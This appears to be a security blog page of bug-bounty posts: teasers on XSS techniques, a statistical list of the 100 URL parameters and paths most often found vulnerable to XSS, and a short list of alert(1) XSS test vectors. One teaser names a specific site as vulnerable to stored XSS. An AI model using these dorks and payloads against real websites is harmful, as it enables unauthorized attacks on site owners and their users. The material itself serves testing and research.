How to find AngularJS XSS

Have you ever heard about publicwww? It’s a search engine for source code. So publicwww will fnd any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code. They have this list that you can search for: AdvertisingMarketingAnalyticsTechnologiesFrontendWidgetsCMS You can find it here https://publicwww.com. They also have plans and pricing if…

XSS Injection with SQLi

XSS Injection with SQLi (XSSQLi) XSS Injection with SQLi (XSSQLi) Well After our discussion on different types of injection and places you can find SQL injection Vulnerability, an attacker can successfully exploit and SQL injection vulnerability and get access over the database and if he is enough lucky to get access to the File System…

Using {XSS} to play games on Site

Hello guys, today I’m going to teach you how to play inside any website that has an XSS flaw.This technique is more aimed at making fun videos satirizing websites or even playing with your friends… The code is very simple because it only emblems the application of the game in question and an opening of…

Stored XSS on h2biz.net

I was surfing the internet when I came across this web portal http://www.h2biz.net which I found to be vulnerable to Reflected XSS. So I attempted to make a Stored XSS because I noticed a kind of message board. I have created a temporary email for registering on the website, then I completed the registration phase….

Top 100 XSS dorks

It’s the end of the year and a good time to share things with people.

After having scanned more than a million websites in order to find XSS and Open Redirect vulnerabilities, I took the time to do statistics on the most vulnerables parameters.

It can be used as a powerful dork list so let’s update your scanners and get bounties!

First here is the list of most vulnerable parameters along with their frequency.

Dork Frequency
q 5.5%
s 4.5%
search 1.9%
id 1.7%
lang 1.4%
keyword 1.2%
query 1.1%
page 1.0%
keywords 0.8%
year 0.8%
view 0.8%
email 0.8%
type 0.7%
name 0.7%
p 0.7%
month 0.6%
immagine 0.6%
list_type 0.5%
url 0.5%
terms 0.5%
categoryid 0.5%
key 0.5%
l 0.5%
begindate 0.4%
enddate 0.4%
categoryid2 0.4%
t 0.4%
cat 0.4%
category 0.4%
action 0.4%
bukva 0.4%
redirect_uri 0.4%
firstname 0.4%
c 0.4%
lastname 0.3%
uid 0.3%
startTime 0.3%
eventSearch 0.3%
categoryids2 0.3%
categoryids 0.3%
sort 0.3%
positiontitle 0.3%
groupid 0.3%
m 0.3%
message 0.3%
tag 0.3%
pn 0.3%
title 0.3%
orgId 0.3%
text 0.3%
handler 0.2%
myord 0.2%
myshownums 0.2%
id_site 0.2%
city 0.2%
search_query 0.2%
msg 0.2%
sortby 0.2%
produkti_po_cena 0.2%
produkti_po_ime 0.2%
mode 0.2%
CODE 0.2%
location 0.2%
v 0.2%
order 0.2%
n 0.2%
term 0.2%
start 0.2%
k 0.2%
redirect 0.2%
ref 0.2%
file 0.2%
mebel_id 0.2%
country 0.2%
from 0.1%
r 0.1%
f 0.1%
field%5B%5D 0.1%
searchScope 0.1%
state 0.1%
phone 0.1%
Itemid 0.1%
lng 0.1%
place 0.1%
bedrooms 0.1%
expand 0.1%
e 0.1%
price 0.1%
d 0.1%
path 0.1%
address 0.1%
day 0.1%
display 0.1%
a 0.1%
error 0.1%
form 0.1%
language 0.1%
mls 0.1%
kw 0.1%
u 0.1%

This second list is almost the same but with corresponding path :

Dork Frequency
/?s= 3.6
/search?q= 2.5
/index.php?lang= 0.6
/pplay/info_prenotazioni.asp?immagine= 0.6
/shared/lgflsearch.php?terms= 0.5
/index.php?page= 0.4
/search?query= 0.4
/en/Telefon-Cam?search= 0.4
/index.php?bukva= 0.4
/pro/events_print_setup.cfm?list_type= 0.3
/pro/events_print_setup.cfm?categoryid= 0.3
/pro/events_print_setup.cfm?categoryid2= 0.3
/?eventSearch= 0.3
/?startTime= 0.3
/pro/events_ical.cfm?categoryids= 0.3
/pro/events_ical.cfm?categoryids2= 0.3
/pro/events_print_setup.cfm?month= 0.3
/pro/events_print_setup.cfm?year= 0.3
/pro/events_print_setup.cfm?begindate= 0.3
/pro/events_print_setup.cfm?enddate= 0.3
/search?keyword= 0.3
/?q= 0.3
/search/?q= 0.3
/index.php?pn= 0.3
/?lang= 0.3
/property/search?uid= 0.3
/index.php?id= 0.3
/search?orgId= 0.3
/products?handler= 0.2
/pro/events_print_setup.cfm?view= 0.2
/pro/events_print_setup.cfm?keywords= 0.2
/?p= 0.2
/search.php?q= 0.2
/?search= 0.2
/pro/minicalendar_detail.cfm?list_type= 0.2
/index.php?produkti_po_cena= 0.2
/index.php?produkti_po_ime= 0.2
/servlet/com.jsbsoft.jtf.core.SG?CODE= 0.2
/login?redirect_uri= 0.2
/connexion?redirect_uri= 0.2
/index.php?action= 0.2
/plugins/actu/listing_actus-front.php?id_site= 0.2
/index.php?mebel_id= 0.2
/search/?search= 0.2
/news/class/index.php?myshownums= 0.2
/news/class/index.php?myord= 0.2
/search.html?searchScope= 0.1
/search?field%5B%5D= 0.1
/videos?tag= 0.1
/videos?place= 0.1
/videos?search= 0.1
/?email= 0.1
/?cat= 0.1
/content.php?expand= 0.1
/?page= 0.1
/search/?s= 0.1
/?keywords= 0.1
/search/?keyword= 0.1
/apps/email/index.jsp?n= 0.1
/?name= 0.1
/?sort= 0.1
/search?search= 0.1
/pro/minicalendar_print_setup.cfm?begindate= 0.1
/pro/minicalendar_print_setup.cfm?enddate= 0.1
/pro/minicalendar_print_setup.cfm?keywords= 0.1
/search-results?q= 0.1
/?listingtypeid= 0.1
/search?s= 0.1
/pro/minicalendar_print_setup.cfm?categoryid2= 0.1
/?bathrooms= 0.1
/?listingagent= 0.1
/?featuredsearchseourl= 0.1
/?squarefeet= 0.1
/?siteid= 0.1
/?bedrooms= 0.1
/?featuredsearch= 0.1
/?price= 0.1
/?maxbuilt= 0.1
/?lsid= 0.1
/?listingtypes= 0.1
/?garages= 0.1
/?maxprice= 0.1
/?minprice= 0.1
/?keywordsany= 0.1
/?yearbuilt= 0.1
/?minbuilt= 0.1
/?subdivision= 0.1
/?lotsizeval= 0.1
/?listingstatusid= 0.1
/?mls= 0.1
/firms/?text= 0.1
/servlet/com.jsbsoft.jtf.core.SG?OBJET= 0.1
/plan_du_site.php?lang= 0.1
/index.php?Itemid= 0.1
/?view= 0.1
/?t= 0.1
/?selat= 0.1
/?selong= 0.1
/?nwlat= 0.1
/?geo= 0.1

I hope you enjoy this 🙂

Best XSS Vectors

Here’s a small #XSS list for manual testing (main cases, high success rate).

 "><img src onerror=alert(1)> 
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Try it on: – URL query, fragment & path; – all input fields.

From BruteLogic Twitter account : https://twitter.com/brutelogic